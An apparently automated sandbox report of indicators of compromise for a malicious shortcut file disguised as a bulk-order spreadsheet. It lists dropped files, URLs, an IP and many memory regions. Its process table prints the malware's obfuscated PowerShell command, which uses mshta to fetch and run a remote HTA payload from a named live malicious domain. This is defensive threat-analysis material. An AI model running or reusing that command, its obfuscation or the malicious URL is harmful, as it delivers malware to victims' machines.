IOC Report
#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk

loading gif

Files

File Path
Type
Category
Malicious
#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=28, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage user DataBase, version 0x620, checksum 0xf8a450ab, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\error[1]
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\drip[1].hta
OpenPGP Public Key
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\error[1]
HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\warning[1]
GIF image data, version 89a, 36 x 38
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n15ex3eq.u54.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xt5vs2ci.kot.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\29340ddd4f2d6b27.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4U9PXHA85KL0OJETOERU.temp
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/drip.hta
malicious
C:\Windows\System32\mshta.exe
"C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/drip.hta
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

URLs

Name
IP
Malicious
https://www.sessosesso.it/assets/aw/drip.hta
89.46.106.29
malicious
https://www.sessosesso.it/assets/aw/drip.htaAC:
unknown
malicious
https://www.sessosesso.it/
unknown
malicious
https://www.sessosesso.it/assets/aw/drip.htadowsINetCache
unknown
https://www.sessosesso.it/assets/aw/drip.htahis
unknown
https://www.sessosesso.it/assets/aw/drip.htahttps://www.sessosesso.it/assets/aw/drip.hta
unknown
https://www.sessosesso.it/assets/aw/drip.hta(e
unknown
https://www.sessosesso.it/assets/aw/drip.htapmwi
unknown
https://www.sessosesso.it/assets/aw/drip.htaq
unknown
https://www.sessosesso.it/assets/aw/drip.hta7
unknown
https://g.live.com/odclientsettings/ProdV21C:
unknown
http://crl.ver)
unknown
https://www.sessosesso.it/assets/aw/drip.htaC:
unknown
https://www.sessosesso.it/assets/aw/drip.htapage.
unknown
https://www.sessosesso.it/assets/aw/drip.hta...BA
unknown
https://www.sessosesso.it/assets/aw/drip.hta=
unknown
https://www.sessosesso.it/assets/aw/drip.hta4C
unknown
https://www.sessosesso.it/assets/aw/drip.htaROWSEo
unknown
https://www.sessosesso.it/assets/aw/drip.htaH
unknown
https://g.live.com/odclientsettings/Prod1C:
unknown
https://www.sessosesso.it/assets/aw/drip.htaK
unknown
https://www.sessosesso.it/assets/aw/drip.hta...
unknown
https://www.sessosesso.it/)
unknown
https://www.sessosesso.it/assets/aw/drip.htaX
unknown
https://www.sessosesso.it/assets/aw/drip.hta0?i
unknown
https://www.sessosesso.it/assets/aw/drip.htadows
unknown
https://www.sessosesso.it/assets/aw/drip.htaHu
unknown
https://www.sessosesso.it/assets/aw/drip.htaa
unknown
There are 18 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.sessosesso.it
89.46.106.29
malicious

IPs

IP
Domain
Country
Malicious
89.46.106.29
www.sessosesso.it
Italy
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName

Memdumps

Base Address
Regiontype
Protect
Malicious
7DF4E0810000
trusted library allocation
page readonly
1C16973D000
heap
page read and write
1C167CED000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CED000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CEB000
heap
page read and write
1C169855000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CF7000
heap
page read and write
1C167E24000
heap
page read and write
10054E000
stack
page read and write
1C167CF7000
heap
page read and write
1C167CED000
heap
page read and write
1C167CF2000
heap
page read and write
1C167E72000
heap
page read and write
1C167CA5000
heap
page read and write
1C167CEB000
heap
page read and write
1C167C94000
heap
page read and write
1C167CED000
heap
page read and write
1C167C8C000
heap
page read and write
1994BC92000
heap
page read and write
1C169762000
heap
page read and write
1C169980000
trusted library allocation
page read and write
1C167CF7000
heap
page read and write
1C167CF7000
heap
page read and write
1C1697BF000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CF7000
heap
page read and write
19951380000
remote allocation
page read and write
360C17E000
unkown
page readonly
1C167200000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CEB000
heap
page read and write
360B07E000
unkown
page readonly
1C167CF3000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF2000
heap
page read and write
1C169963000
trusted library allocation
page read and write
360BA7E000
stack
page read and write
7DF4E0821000
trusted library allocation
page execute read
1B9654A4000
heap
page read and write
1C167CED000
heap
page read and write
360AF7C000
stack
page read and write
1C167CF3000
heap
page read and write
1C167CF7000
heap
page read and write
1C167E42000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF7000
heap
page read and write
1C16969D000
trusted library allocation
page read and write
1994CBD0000
trusted library section
page readonly
1995144F000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CFD000
heap
page read and write
1C167CED000
heap
page read and write
1994C390000
trusted library section
page read and write
1B9651E2000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
1C167CF2000
heap
page read and write
1994CBE0000
trusted library section
page readonly
1C168160000
heap
page readonly
1C169848000
heap
page read and write
19951505000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF3000
heap
page read and write
100E4E000
stack
page read and write
1C169940000
trusted library allocation
page read and write
1C167CC6000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CF2000
heap
page read and write
1B966C76000
heap
page read and write
1C1699D4000
trusted library allocation
page read and write
1C167CF3000
heap
page read and write
1C167CED000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF2000
heap
page read and write
360B87E000
unkown
page readonly
1C167CF7000
heap
page read and write
1C167CF7000
heap
page read and write
1C1696B0000
trusted library allocation
page read and write
360B4FE000
stack
page read and write
1C167CEB000
heap
page read and write
1C167E2C000
heap
page read and write
1B965484000
heap
page read and write
1C167E58000
heap
page read and write
1C169699000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
1C167CED000
heap
page read and write
1C167CF3000
heap
page read and write
1C167D09000
heap
page read and write
1C169764000
heap
page read and write
1994CBB0000
trusted library section
page readonly
1C1671F8000
trusted library allocation
page read and write
19951461000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF3000
heap
page read and write
360B8FE000
stack
page read and write
1C167CEB000
heap
page read and write
199514F5000
heap
page read and write
1C167CF9000
heap
page read and write
1C167D0F000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CED000
heap
page read and write
1C167CED000
heap
page read and write
1C167CED000
heap
page read and write
360B2FE000
stack
page read and write
1C167D03000
heap
page read and write
1C167CED000
heap
page read and write
1C167CF3000
heap
page read and write
1C1697B7000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CA3000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF7000
heap
page read and write
199511D0000
trusted library allocation
page read and write
1C167CED000
heap
page read and write
1C167CEB000
heap
page read and write
19951140000
trusted library allocation
page read and write
360BD79000
stack
page read and write
1B966E30000
heap
page read and write
1B9654AE000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CA5000
heap
page read and write
7DF4E0801000
trusted library allocation
page execute read
1C167CA6000
heap
page read and write
1C167CF2000
heap
page read and write
1C167D21000
heap
page read and write
1C167EC8000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CED000
heap
page read and write
1C167D09000
heap
page read and write
1B965226000
heap
page read and write
1C167CF2000
heap
page read and write
360B37E000
unkown
page readonly
1C167CED000
heap
page read and write
1C167E1C000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CF7000
heap
page read and write
1C167D22000
heap
page read and write
1C167CFB000
heap
page read and write
1C168170000
trusted library allocation
page read and write
1994BCAD000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CE0000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF7000
heap
page read and write
1994C402000
heap
page read and write
360C27B000
stack
page read and write
1C167CED000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CED000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CEB000
heap
page read and write
1C169970000
trusted library allocation
page read and write
199512B0000
trusted library allocation
page read and write
1C16970B000
trusted library allocation
page read and write
1C1697D9000
heap
page read and write
199512A0000
trusted library allocation
page read and write
1C167CF2000
heap
page read and write
19951500000
heap
page read and write
1C167CF7000
heap
page read and write
1C1671C0000
trusted library allocation
page read and write
1C167CF7000
heap
page read and write
1C167CF2000
heap
page read and write
1995122E000
trusted library allocation
page read and write
1C167CED000
heap
page read and write
1C167CED000
heap
page read and write
1C167CED000
heap
page read and write
1C169858000
heap
page read and write
1B965274000
heap
page read and write
199514FB000
heap
page read and write
1994CBC0000
trusted library section
page readonly
1C167CF3000
heap
page read and write
1C1671E8000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF7000
heap
page read and write
1C169853000
heap
page read and write
1C167CED000
heap
page read and write
1C167D10000
heap
page read and write
1C16721C000
trusted library allocation
page read and write
100F9F000
stack
page read and write
1C167CEB000
heap
page read and write
1C167CF3000
heap
page read and write
1C16975C000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CF3000
heap
page read and write
1C167C81000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF7000
heap
page read and write
1C1699D4000
trusted library allocation
page read and write
1C167E6D000
heap
page read and write
1C167CED000
heap
page read and write
199514C1000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF6000
heap
page read and write
19951200000
trusted library allocation
page read and write
1C167CED000
heap
page read and write
1C167CF2000
heap
page read and write
1B9653E0000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
1B9652B5000
heap
page read and write
1C167CED000
heap
page read and write
1B9653D0000
heap
page read and write
360B47E000
unkown
page readonly
1C167CF2000
heap
page read and write
1C167CF7000
heap
page read and write
1C16DA42000
trusted library allocation
page read and write
1994BCA3000
heap
page read and write
1C1697D9000
heap
page read and write
1C16984B000
heap
page read and write
1C1696B5000
trusted library allocation
page read and write
1C169954000
trusted library allocation
page read and write
1994C380000
trusted library allocation
page read and write
1C1696CA000
trusted library allocation
page read and write
1C169920000
trusted library allocation
page read and write
1C167CF7000
heap
page read and write
1C167CEB000
heap
page read and write
1C169924000
trusted library allocation
page read and write
1C167CF7000
heap
page read and write
199514E1000
heap
page read and write
1C167CF3000
heap
page read and write
10094A000
stack
page read and write
1C167E56000
heap
page read and write
1C167CEB000
heap
page read and write
10129C000
trusted library allocation
page read and write
1C169853000
heap
page read and write
360C07B000
stack
page read and write
1C167CF3000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF2000
heap
page read and write
1C1696B8000
trusted library allocation
page read and write
360B97E000
unkown
page readonly
1C16984B000
heap
page read and write
1994D111000
trusted library allocation
page read and write
1C167CF7000
heap
page read and write
1C169853000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CEB000
heap
page read and write
1C1697CA000
heap
page read and write
1C167CF3000
heap
page read and write
1C167DD0000
heap
page read and write
1995142E000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF7000
heap
page read and write
1994BC6D000
heap
page read and write
1C169708000
trusted library allocation
page read and write
1C169857000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CF7000
heap
page read and write
1C167E2E000
heap
page read and write
19951400000
heap
page read and write
1C167CEB000
heap
page read and write
1994BC9D000
heap
page read and write
1C1696BE000
trusted library allocation
page read and write
1B966E3D000
heap
page read and write
1C167CED000
heap
page read and write
1C167CF3000
heap
page read and write
1C169760000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF2000
heap
page read and write
1C167D21000
heap
page read and write
1C167CED000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF7000
heap
page read and write
360B67D000
stack
page read and write
1C167CF7000
heap
page read and write
360A877000
stack
page read and write
1C167DF0000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CED000
heap
page read and write
1994D140000
trusted library allocation
page read and write
1C16970D000
trusted library allocation
page read and write
1C16DE20000
trusted library allocation
page read and write
1C167CF7000
heap
page read and write
1C1697D7000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CF7000
heap
page read and write
19951421000
heap
page read and write
1C167D19000
heap
page read and write
1C167CF7000
heap
page read and write
1994C51A000
heap
page read and write
1C167CF2000
heap
page read and write
19951320000
trusted library allocation
page read and write
1C16DED0000
trusted library allocation
page read and write
1C167228000
trusted library allocation
page read and write
1C167CF2000
heap
page read and write
1C167CF7000
heap
page read and write
1C167D10000
heap
page read and write
1C167CF3000
heap
page read and write
1C167D03000
heap
page read and write
1C16984B000
heap
page read and write
1C167CED000
heap
page read and write
1C167CED000
heap
page read and write
360B57E000
unkown
page readonly
1C167CF7000
heap
page read and write
1B966E34000
heap
page read and write
1C167CED000
heap
page read and write
1C167CF9000
heap
page read and write
1C167CED000
heap
page read and write
1B966C68000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CEB000
heap
page read and write
1C167D2A000
heap
page read and write
199511B0000
trusted library allocation
page read and write
1C168140000
trusted library allocation
page execute
1C167D22000
heap
page read and write
1C167CEB000
heap
page read and write
1994C500000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CED000
heap
page read and write
1C169954000
trusted library allocation
page read and write
1C167CF7000
heap
page read and write
1B966C7A000
heap
page read and write
1C16720C000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
1C169928000
trusted library allocation
page read and write
1C16727C000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
1C169968000
trusted library allocation
page read and write
1C167CF2000
heap
page read and write
1C167CEB000
heap
page read and write
1C167E26000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CF7000
heap
page read and write
1C167D09000
heap
page read and write
19951150000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CEB000
heap
page read and write
1C167D09000
heap
page read and write
1994BC00000
heap
page read and write
1C167CF2000
heap
page read and write
1C167F00000
heap
page read and write
1C169948000
trusted library allocation
page read and write
1C167CF3000
heap
page read and write
19951210000
trusted library allocation
page read and write
100E9F000
stack
page read and write
1C167CEB000
heap
page read and write
1C167CED000
heap
page read and write
1C167CEB000
heap
page read and write
1C1697D7000
heap
page read and write
1C1671F0000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
1C1697D2000
heap
page read and write
1C167CF2000
heap
page read and write
1B9651A0000
heap
page read and write
1994C400000
heap
page read and write
360A2CC000
stack
page read and write
1C167214000
trusted library allocation
page read and write
360B3FE000
stack
page read and write
199512A0000
trusted library allocation
page read and write
1C167CF7000
heap
page read and write
1C167CEB000
heap
page read and write
360BC7E000
unkown
page readonly
1C167CF2000
heap
page read and write
1C167188000
trusted library allocation
page read and write
1B9653F0000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
1C16722C000
trusted library allocation
page read and write
1B9654A0000
heap
page read and write
1C167CEB000
heap
page read and write
360BBFE000
stack
page read and write
1C167CEC000
heap
page read and write
1C16996C000
trusted library allocation
page read and write
1C1671B4000
trusted library allocation
page read and write
1C167CF2000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CED000
heap
page read and write
360B7FE000
stack
page read and write
1C167CF3000
heap
page read and write
1994BC5B000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF7000
heap
page read and write
1C167E28000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CF3000
heap
page read and write
100A4F000
stack
page read and write
1C167CED000
heap
page read and write
1C167CF7000
heap
page read and write
1C16988C000
heap
page read and write
100D4F000
stack
page read and write
1C167CF7000
heap
page read and write
1994BBF0000
heap
page read and write
1C167D35000
heap
page read and write
1C167CF7000
heap
page read and write
1C167E18000
heap
page read and write
1C1671E0000
trusted library allocation
page read and write
1C167CF7000
heap
page read and write
1C167CED000
heap
page read and write
1B965170000
heap
page read and write
1C16DEC0000
trusted library allocation
page read and write
1C167DD0000
remote allocation
page read and write
1C167CF7000
heap
page read and write
1C167CF2000
heap
page read and write
1C16DEC3000
trusted library allocation
page read and write
1C167CED000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF3000
heap
page read and write
1C169948000
trusted library allocation
page read and write
1994BC6B000
heap
page read and write
1994C791000
trusted library allocation
page read and write
1C169970000
trusted library allocation
page read and write
1C167220000
trusted library allocation
page read and write
1C167D03000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF9000
heap
page read and write
199511F0000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
1C167E14000
heap
page read and write
1C16996C000
trusted library allocation
page read and write
1C167CED000
heap
page read and write
1C167CF3000
heap
page read and write
1C16975E000
heap
page read and write
1C167CED000
heap
page read and write
1C167198000
trusted library allocation
page read and write
1C167192000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
1994BC68000
heap
page read and write
1C167CEB000
heap
page read and write
1994BC13000
heap
page read and write
1C167CEB000
heap
page read and write
19951380000
remote allocation
page read and write
1C167CF3000
heap
page read and write
1C167CEB000
heap
page read and write
1B966C72000
heap
page read and write
1C167CED000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF7000
heap
page read and write
19951200000
trusted library allocation
page read and write
1C16DEB0000
trusted library allocation
page read and write
1C169731000
heap
page read and write
360A97E000
unkown
page readonly
1C167CF9000
heap
page read and write
1C1697C3000
heap
page read and write
199514CD000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CED000
heap
page read and write
1C167DD0000
remote allocation
page read and write
1C167CF7000
heap
page read and write
199514C3000
heap
page read and write
1C169963000
trusted library allocation
page read and write
1C169757000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF3000
heap
page read and write
1C169944000
trusted library allocation
page read and write
1C1697DA000
heap
page read and write
1C167CED000
heap
page read and write
360AB7E000
stack
page read and write
1C167CF7000
heap
page read and write
1C167CF2000
heap
page read and write
1B965180000
heap
page read and write
1C169740000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CED000
heap
page read and write
1C167CEB000
heap
page read and write
1994BD29000
heap
page read and write
1C167DD0000
remote allocation
page read and write
1C167CF7000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF7000
heap
page read and write
1C169848000
heap
page read and write
1B965200000
heap
page read and write
1C167CED000
heap
page read and write
1994BC63000
heap
page read and write
1994BCBB000
heap
page read and write
1994BD02000
heap
page read and write
1995150C000
heap
page read and write
1B9652C4000
heap
page read and write
1C167CED000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CED000
heap
page read and write
1C16988C000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CD9000
heap
page read and write
1C167CF7000
heap
page read and write
1C1696F1000
trusted library allocation
page read and write
1C167D10000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CF2000
heap
page read and write
1C169944000
trusted library allocation
page read and write
1C167CF3000
heap
page read and write
360AD7B000
stack
page read and write
1C167CF7000
heap
page read and write
1C167CEB000
heap
page read and write
1994BD13000
heap
page read and write
1C1671B8000
trusted library allocation
page read and write
1C167E94000
heap
page read and write
1C167CF3000
heap
page read and write
1994CA40000
trusted library allocation
page read and write
1994BCFE000
heap
page read and write
1000F2000
stack
page read and write
1C167E16000
heap
page read and write
1C1671C4000
trusted library allocation
page read and write
1B965207000
heap
page read and write
1C167CED000
heap
page read and write
1B965420000
heap
page read and write
1C167CF7000
heap
page read and write
1994BC8B000
heap
page read and write
1C167CEB000
heap
page read and write
1C167D1F000
heap
page read and write
1C167CF7000
heap
page read and write
1C169930000
trusted library allocation
page read and write
1C167CED000
heap
page read and write
360C8FE000
stack
page read and write
1C167CF7000
heap
page read and write
1C167CED000
heap
page read and write
1C167CF3000
heap
page read and write
1C167DEE000
heap
page read and write
1C167CF7000
heap
page read and write
19951320000
trusted library allocation
page read and write
199511C0000
trusted library allocation
page read and write
360BDFE000
stack
page read and write
1C167CF7000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CF7000
heap
page read and write
1C169848000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CED000
heap
page read and write
1C169720000
heap
page read and write
360BB7E000
unkown
page readonly
1C167D2C000
heap
page read and write
1C167CED000
heap
page read and write
19952000000
heap
page read and write
1C169940000
trusted library allocation
page read and write
1C16974B000
heap
page read and write
1C167CF3000
heap
page read and write
1C167D10000
heap
page read and write
360AC7E000
unkown
page readonly
1C167CF2000
heap
page read and write
1B965480000
heap
page read and write
1C167CEB000
heap
page read and write
360C97E000
unkown
page readonly
1994BEF0000
heap
page read and write
1C16DEB0000
trusted library allocation
page read and write
1C167CF7000
heap
page read and write
1994CCF0000
trusted library allocation
page read and write
19951483000
heap
page read and write
1C167CF7000
heap
page read and write
360B77E000
unkown
page readonly
360B17B000
stack
page read and write
1C167CEB000
heap
page read and write
1C167CEB000
heap
page read and write
7DF4E0811000
trusted library allocation
page execute read
1C167CED000
heap
page read and write
1C167CF7000
heap
page read and write
1C167D03000
heap
page read and write
1C167D26000
heap
page read and write
19951442000
heap
page read and write
1C167CED000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF3000
heap
page read and write
1C16978F000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CF7000
heap
page read and write
199511D1000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
360B27E000
unkown
page readonly
1C167CF7000
heap
page read and write
19951454000
heap
page read and write
1C167CED000
heap
page read and write
1C169857000
heap
page read and write
1C167CF7000
heap
page read and write
1C1697AD000
heap
page read and write
1C167CED000
heap
page read and write
1994CBF0000
trusted library section
page readonly
1C167CDD000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CEB000
heap
page read and write
1C167224000
trusted library allocation
page read and write
1C167D10000
heap
page read and write
19951310000
trusted library allocation
page read and write
1C167CED000
heap
page read and write
360C37E000
unkown
page readonly
1C167CEB000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF3000
heap
page read and write
1C16727C000
trusted library allocation
page read and write
1C16718C000
trusted library allocation
page read and write
1C167D03000
heap
page read and write
1C169772000
heap
page read and write
1C16DEC0000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
1C169968000
trusted library allocation
page read and write
1C169697000
trusted library allocation
page read and write
1C167CF7000
heap
page read and write
1C169705000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CEB000
heap
page read and write
1C167C91000
heap
page read and write
1C167CF7000
heap
page read and write
199514EC000
heap
page read and write
1C167D14000
heap
page read and write
1C167CED000
heap
page read and write
1994BE10000
heap
page read and write
1C167D31000
heap
page read and write
1C167CED000
heap
page read and write
199514FD000
heap
page read and write
1C167E20000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF3000
heap
page read and write
19951214000
trusted library allocation
page read and write
1C169844000
heap
page read and write
1C167CF3000
heap
page read and write
10109B000
stack
page read and write
1C167210000
trusted library allocation
page read and write
360AE7E000
unkown
page readonly
1C167CF7000
heap
page read and write
199511D0000
trusted library allocation
page read and write
19951330000
trusted library allocation
page read and write
1C167CED000
heap
page read and write
1C167E32000
heap
page read and write
1994C51A000
heap
page read and write
199514E3000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CF3000
heap
page read and write
1C167E51000
heap
page read and write
1C167208000
trusted library allocation
page read and write
1C167CEB000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CF9000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CEB000
heap
page read and write
1C169980000
trusted library allocation
page read and write
1B966C50000
heap
page read and write
10074C000
stack
page read and write
100B4D000
stack
page read and write
1C167CED000
heap
page read and write
1994BC2B000
heap
page read and write
10119E000
stack
page read and write
1C167CF2000
heap
page read and write
1C167CED000
heap
page read and write
199514F1000
heap
page read and write
1C167CF7000
heap
page read and write
1994C513000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF3000
heap
page read and write
360BF7E000
unkown
page readonly
1C167CF3000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CF3000
heap
page read and write
1C167CF2000
heap
page read and write
1C169855000
heap
page read and write
1C167218000
trusted library allocation
page read and write
1C167CF3000
heap
page read and write
1C1699D4000
trusted library allocation
page read and write
1C167CED000
heap
page read and write
10064C000
stack
page read and write
1C169695000
trusted library allocation
page read and write
1C167CF3000
heap
page read and write
1C167230000
trusted library allocation
page read and write
1994C502000
heap
page read and write
1C167CED000
heap
page read and write
1C16DEB0000
trusted library allocation
page read and write
1C167CF7000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CED000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CEB000
heap
page read and write
1B966C6E000
heap
page read and write
19951502000
heap
page read and write
1C167CF2000
heap
page read and write
1C167CEB000
heap
page read and write
1C167CF7000
heap
page read and write
1C1699D4000
trusted library allocation
page read and write
100C4E000
stack
page read and write
1C167CF7000
heap
page read and write
1C167CF7000
heap
page read and write
1C167CF7000
heap
page read and write
1C1671D9000
trusted library allocation
page read and write
360BE7E000
unkown
page readonly
1C167CF7000
heap
page read and write
1C167C70000
heap
page read and write
19951380000
remote allocation
page read and write
1C167470000
trusted library allocation
page read and write
1994BC3F000
heap
page read and write
1C167CF7000
heap
page read and write
1994C415000
heap
page read and write
1C16DED0000
trusted library allocation
page read and write
199514E5000
heap
page read and write
1994CBA0000
trusted library section
page readonly
1C167CF3000
heap
page read and write
1C167CF7000
heap
page read and write
1995150A000
heap
page read and write
1B966C54000
heap
page read and write
7DF4E0800000
trusted library allocation
page readonly
1C167CF7000
heap
page read and write
1C169980000
trusted library allocation
page read and write
19951300000
trusted library allocation
page read and write
1C167E22000
heap
page read and write
1B9652B9000
heap
page read and write
1C167CED000
heap
page read and write
1C167CF2000
heap
page read and write
1C169691000
trusted library allocation
page read and write
There are 728 hidden memdumps, click here to show them.